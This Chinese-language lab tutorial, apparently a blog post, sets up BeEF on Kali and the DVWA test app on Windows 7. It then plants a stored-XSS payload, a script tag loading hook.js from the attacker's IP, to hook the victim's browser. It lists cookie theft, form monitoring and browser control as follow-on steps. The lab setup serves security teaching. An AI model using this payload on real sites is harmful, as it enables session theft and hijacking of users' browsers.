利用BeEF执行XSS攻击

文章目录

  • 前言
  • 一:安装BeEF
  • 二:配置靶机环境
    • 1.访问https://www.xp.cn/,下载phpstudy软件(下载最新版的就可以)
    • 2.安装好后启动PHPstudy,点击启动Apache服务与MySQL服务进行测试
    • 3.在浏览器访问127.0.0.1或者localhost,出现“站点创建成功”,则phpstudy安装成功
    • 4.访问https://github.com/ethicalhack3r/DVWA,下载压缩包
    • 5.将解压后的DVWA文件夹放到phpstudy安装目录下
    • 6.进入DVWA文件夹,将文件config.inc.php.dist复制为一个副本,将副本修改为config.inc.php,双击从记事本里面打开。
    • 7.打开config.inc.php文件后,将文件中的db_user db_password,分别修改为root,root
    • 8.保持phpstudy开启状态,在浏览器中输入网址:http://127.0.0.1/DVWA-master,进入配置安装界面,点击Setup/Reset DB
    • 9.第一次安装可能在方框内会出现标红,下面依次解决: 打开dvwa下面的config.inc.php文件,在文件里面找到这两串代码
    • 10.在phpstudy的安装目录中,找到php.ini文件
    • 11.将allow_url_fopen和allow_url_include的值改为On
    • 12.最后重启一下phpstudy中的Apache与mysql服务
  • 三: 利用DOM XSS案例
    • (1)将win7靶机中的DWVA难度调为low
    • (2)在XSS(Stored)下输入脚本命令
    • (3)点击Sign Guestbook,kali那边Beef就勾上了靶机所在的浏览器了
  • 四:控制受害者的浏览器
  • 五:总结

前言

XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。BeEF是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。

本文将介绍如何利用BeEF执行XSS攻击。

一:安装BeEF

首先,需要在Kali Linux上安装BeEF。在终端中输入以下命令以root用户):

apt-get update
apt-get install beef-xss

安装完成后,在终端中输入以下命令启动BeEF:

cd /usr/share/beef-xss(切换到beef-xss目录中来打开beef,以实际安装路径为主)

./beef
利用BeEF执行XSS攻击_第1张图片

然后,在浏览器中输入http://127.0.0.1:3000/ui/panel来访问BeEF的控制面板。
利用BeEF执行XSS攻击_第2张图片
可以通过查看etc/beef-xss/config.yaml文件来知道用户名和密码

利用BeEF执行XSS攻击_第3张图片
成功进入beef主页面
利用BeEF执行XSS攻击_第4张图片

二:配置靶机环境

实验靶机:Windows7 64位
*

1.访问https://www.xp.cn/,下载phpstudy软件(下载最新版的就可以)

利用BeEF执行XSS攻击_第5张图片

2.安装好后启动PHPstudy,点击启动Apache服务与MySQL服务进行测试

利用BeEF执行XSS攻击_第6张图片

3.在浏览器访问127.0.0.1或者localhost,出现“站点创建成功”,则phpstudy安装成功

利用BeEF执行XSS攻击_第7张图片

4.访问https://github.com/ethicalhack3r/DVWA,下载压缩包

利用BeEF执行XSS攻击_第8张图片

5.将解压后的DVWA文件夹放到phpstudy安装目录下

利用BeEF执行XSS攻击_第9张图片

6.进入DVWA文件夹,将文件config.inc.php.dist复制为一个副本,将副本修改为config.inc.php,双击从记事本里面打开。

利用BeEF执行XSS攻击_第10张图片

7.打开config.inc.php文件后,将文件中的db_user db_password,分别修改为root,root

利用BeEF执行XSS攻击_第11张图片

8.保持phpstudy开启状态,在浏览器中输入网址:http://127.0.0.1/DVWA-master,进入配置安装界面,点击Setup/Reset DB

利用BeEF执行XSS攻击_第12张图片

9.第一次安装可能在方框内会出现标红,下面依次解决: 打开dvwa下面的config.inc.php文件,在文件里面找到这两串代码

在这里插入图片描述
将这两串key输入进去

public: 6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb
private:6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K

10.在phpstudy的安装目录中,找到php.ini文件

利用BeEF执行XSS攻击_第13张图片

11.将allow_url_fopen和allow_url_include的值改为On

利用BeEF执行XSS攻击_第14张图片

12.最后重启一下phpstudy中的Apache与mysql服务

再次访问http://127.0.0.1/DVWA-maste中的设置,你可以发现都正常了,可能会跳转到登陆页面,那就说明安装成功,输入账号和密码:DVWA的默认账号和默认密码分别是:admin 和 password*

三: 利用DOM XSS案例

(1)将win7靶机中的DWVA难度调为low


*

(2)在XSS(Stored)下输入脚本命令

Name:ceshi(自己取一个名字)
Message:*

<script src="http://192.xxx.xxx.xxx(自己的kaliIP地址):3000/hook.js"></script>

利用BeEF执行XSS攻击_第15张图片

(3)点击Sign Guestbook,kali那边Beef就勾上了靶机所在的浏览器了

利用BeEF执行XSS攻击_第16张图片

四:控制受害者的浏览器

当攻击成功后,可以在BeEF的控制面板中查看受害者的浏览器信息,并控制其浏览器。可以进行以下操作:

  1. 查看受害者的浏览器历史记录和Cookie信息。
  2. 监听受害者的浏览器行为,如点击链接、填写表单等。
  3. 控制受害者的浏览器,比如打开页面、关闭页面等。

五:总结

通过使用BeEF可以轻松地进行XSS攻击,并控制受害者的浏览器。因此,为了保护自己的网站和个人隐私,我们应该加强对XSS攻击的防范。

你可能感兴趣的:(xss)